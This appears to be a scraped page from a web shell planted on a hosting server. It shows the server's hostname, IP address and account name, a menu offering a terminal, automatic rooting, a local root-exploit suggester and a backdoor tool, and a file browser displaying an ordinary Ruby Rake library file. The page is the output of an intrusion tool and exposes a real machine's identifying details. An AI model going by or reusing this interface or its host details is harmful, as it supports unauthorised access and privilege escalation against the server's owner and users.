Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby22 /
lib64 /
ruby /
2.2.0 /
rake /
contrib /
Delete
Unzip
Name
Size
Permission
Date
Action
compositepublisher.rb
351
B
-rw-r--r--
2011-06-24 03:41
ftptools.rb
3.15
KB
-rw-r--r--
2014-07-15 08:37
publisher.rb
2
KB
-rw-r--r--
2014-07-15 08:37
rubyforgepublisher.rb
343
B
-rw-r--r--
2014-07-15 08:37
sshpublisher.rb
1.43
KB
-rw-r--r--
2014-07-15 08:37
sys.rb
129
B
-rw-r--r--
2014-07-15 08:37
Save
Rename
module Rake # Manage several publishers as a single entity. class CompositePublisher def initialize @publishers = [] end # Add a publisher to the composite. def add(pub) @publishers << pub end # Upload all the individual publishers. def upload @publishers.each { |p| p.upload } end end end